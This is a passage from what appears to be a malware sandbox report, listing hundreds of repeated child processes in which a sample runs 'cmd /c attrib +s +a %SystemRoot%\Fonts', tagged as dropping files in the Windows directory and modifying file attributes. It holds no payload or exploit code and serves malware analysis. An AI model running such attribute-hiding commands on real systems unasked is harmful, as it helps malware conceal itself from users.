      3⤵
      PID:4048
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:3152
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4064
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:3000
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:1188
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:640
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4128
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:2916
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:1788
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:224
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:5112
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:2464
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:2512
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:4780
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
                                                                                                                                                                                                                PID:3012
                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3720
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3192
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                      PID:4816
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1984
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                        PID:1308
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3300
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          PID:1352
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1428
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:3716
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3044
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                PID:2808
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1016
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                  PID:3588
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1912
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2264
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:688
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        PID:3000
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                          PID:3412
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3532
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            PID:3724
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
          4⤵
          PID:224
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:3536
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:2740
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:4456
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:2528
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:3524
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:216
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:2180
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:5088
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:4876
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:4436
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:4516
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:2128
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:4224
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:1568
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:3976
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:5084
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:1100
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:4524
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:4556
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:1960
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:3404
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:880
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:3588
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:1224
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:2384
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:372
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:668
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:3980
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +s +a %SystemRoot%\Fonts
        3⤵
        PID:2824
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:860
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:3660
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:1012
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1648
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:3264
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1668
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                    PID:5012
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:2396
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:1756
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:2348
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:3280
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:4564
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                              PID:2712
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2604
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:452
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    PID:4820
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:1308
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      PID:1928
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:212
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        PID:3920
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:1100
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Drops file in Windows directory
                PID:2480
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:4556
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                PID:4088
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:4428
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Views/modifies file attributes
                PID:3404
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:4832
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                PID:3612
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:712
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                PID:2384
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:1752
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Drops file in Windows directory
                PID:668
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:4080
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Drops file in Windows directory
                PID:2308
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:4852
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Views/modifies file attributes
                PID:1340
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:2636
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:2472
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:4568
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Drops file in Windows directory
                PID:4680
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:2452
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                4⤵
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:3532
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c attrib +s +a %SystemRoot%\Fonts
            3⤵
            PID:2412
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4512
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2348
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2284
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5080
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1640
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:740
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4588
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                    PID:2524
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3976
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                      PID:1172
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1960
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                            PID:1920
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1428
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3044
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4936
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3444
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:2684
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3008
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3636
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                          PID:2240
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4048
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                            PID:3412
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
